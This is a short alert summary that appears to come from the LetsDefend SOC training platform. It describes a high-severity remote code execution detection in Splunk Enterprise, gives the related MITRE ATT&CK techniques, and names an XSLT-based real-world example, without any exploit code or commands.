LetsDefend Monitoring Alert

Remote Code Execution Detected in Splunk Enterprise

Nov, 21, 2023, 12:24 PM

Event ID: 201

Event Time: Nov, 21, 2023, 12:24 PM

Rule Name: SOC239 - Remote Code Execution Detected in Splunk Enterprise

Alert Type: Unauthorized Access

MITRE Technique:
T1190 - Initial Access - Exploit Public-Facing Application,
T1136 - Persistence - Create Account,
T1199 - Initial Access - Trusted Relationship,
T1059.004 - Execution - Command and Scripting Interpreter: Unix Shell,
T1210 - Lateral Movement - Exploitation of Remote Services,

Real World Example:Splunk App for Lookup File Editing RCE via User XSLT

Severity: High

Security Analyst

2024 © LetsDefend

45305 Catalina ct. Suite 150, Sterling VA 20166